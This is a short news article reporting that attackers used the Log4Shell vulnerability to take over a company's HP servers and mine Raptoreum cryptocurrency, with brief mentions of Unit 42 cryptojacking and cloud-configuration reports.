- Hackers gained control of HP servers belonging to an undisclosed company and repurposed the hardware to mine cryptocurrency.
- Raptoreum, a top 1000 coin by market cap, was determined to be the coin the hackers would use.
- On December 9, it began mining Raptoreum, and its hash power was superior to every other party’s at the time.
An undisclosed company had a group of HP servers hacked by hackers who took control of the hardware and repurposed it to mine cryptocurrency. It was decided that the hackers would use raptoreum, a coin that is among the top 1,000 coins by market cap, and which uses an algorithm called Ghostrider, a blend of PoW (proof-of-work) and PoS (proof-of-stake) consensus mechanisms.
It’s the mining of Raptoreum began on December 9, and at the time, its hash power was superior to that of every other party on the Raptoreum blockchain. In the period between December 9 and December 17, the attackers scooped up over $110,000 in raptoreum.
On December 17, the server group disappeared from Raptoreun’s network, indicating that it was patched to eliminate the threat as soon as it was discovered.
A vulnerability known as Log4shell was exploited in the attack, allowing attackers to gain remote control over affected systems. In Log4shell, Log4j is used, which is a registry library widely used in Apache-based systems. Early in December, this vulnerability was discovered, and in this case, it was used by an attacker to execute crypto mining software.
Due to how common its utilization is, even in massive organizations like Microsoft and IBM, the vulnerability has been categorized as critical by its discoverers. Investigators are still finding new ways to exploit the software, even after some of its implementations have been patched. Recently, it was discovered that the software can also be exploited for local attacks, with the servers being able to execute code while not connected to the internet.
Reports released by Unit 42, a security consulting firm, show that crypto-jacking attacks decreased for the first time since 2018, according to their “Cloud Thread Report” for the first half of 2019. In a follow-up report, the firm revealed that 63% of the third-party code templates used to build cloud infrastructure contained insecure configurations that could lead to losing control over the hardware.